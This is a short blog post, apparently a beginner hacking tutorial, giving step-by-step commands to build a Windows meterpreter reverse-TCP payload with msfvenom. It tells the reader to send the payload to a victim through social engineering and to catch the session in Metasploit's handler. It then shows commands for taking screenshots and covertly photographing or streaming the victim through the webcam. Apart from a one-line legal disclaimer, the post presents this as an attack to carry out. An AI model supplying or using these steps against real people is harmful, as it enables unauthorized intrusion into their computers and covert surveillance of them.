HACKING

Hacking Is Fun. Use Hacking Only For Legal Purpose.

Latest Posts

Sunday, November 11, 2018

How To Hack a Windows Computer By Using a Simple Payload.

How To Hack Computers For Beginners

Hello Friends! Today we learn “how to hack Computer (PC), You can hack windows by sending a payload to the victim’s PC.


Once the user installs the payload your meterpreter session starts running and then you do anything with the victim’s PC. You can send this payload via social engineering and here lots of methods present to send that payload to the victim’s system.


Let’s Start, Open your terminal and type
ifconfig
to know your private IP.
Find IP of the system
then type
msfvenom -p windows/meterpreter/reverse_tcp lhost=’Your Private IP’ lport=4444 -f exe -a x86 > Hackingwithtermux.exe
and then hit enter and your payload for windows is ready. Your payload is present in the root folder. Now, transfer this payload to your victim’s PC.


Now open your Metasploit by typing
msfconsole
msfconsole start
After opening Metasploit. Just configure some settings. By typing
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ‘Your Private IP’
set lport 4444
exploit
starting exploiting
Now, install the payload to the victim’s system and then you see here you get meterpreter session. So, enjoy the victim’s system is hacked and now you can change and configure anything to this hack PC. But here, I will show you some commands of using it. type
sysinfo
to check the information of the system.
system is hacked and we see the sys info
type
screenshot
This will capture a screenshot of the victim’s PC.
i take screenshot here
You can also try webcam_snap & webcam_stream for taking pictures from victim’s device camera without knowing her. If you want some more commands then type
help
this will show you many different commands which you can use an exploit.
this shows help

No comments:

Post a Comment